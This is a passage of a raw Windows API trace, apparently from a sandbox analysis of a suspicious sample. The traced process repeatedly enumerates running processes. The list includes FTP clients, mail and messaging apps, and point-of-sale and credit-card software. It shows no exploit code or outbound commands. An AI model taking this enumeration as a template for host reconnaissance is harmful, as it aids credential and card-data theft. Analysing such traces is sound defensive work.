dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0222.642] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0222.644] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0222.645] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0222.648] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0222.649] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0222.651] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0222.653] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0222.655] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0222.656] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0222.658] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0222.660] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0222.662] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0222.666] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0222.707] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0222.709] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0222.712] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0222.714] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0222.716] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0222.718] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0222.720] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0222.723] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0222.726] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0222.728] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0222.730] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0222.732] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0222.734] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0222.736] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0222.738] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0222.758] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0222.761] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0222.764] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0222.767] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0222.770] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0222.772] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0222.775] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0222.777] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0222.779] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0222.781] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0222.783] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0222.786] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0222.788] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0222.790] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0222.798] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0222.800] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0222.802] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0222.804] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0222.806] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0222.808] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0222.810] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0222.812] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0222.813] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0222.815] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0222.817] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0222.819] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0222.821] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0222.823] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0222.826] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0222.830] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0222.832] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.865] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0222.868] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0222.871] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0222.873] CloseHandle (hObject=0x21cc) returned 1 [0222.874] Sleep (dwMilliseconds=0x64) [0222.997] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x14ac [0223.019] Process32First (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.022] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.025] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.033] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.035] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.114] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.117] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.119] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.121] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.123] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.125] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.127] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.130] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.132] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.134] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.136] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.138] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.140] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.142] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.144] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.177] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0223.179] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x620, pcPriClassBase=8, 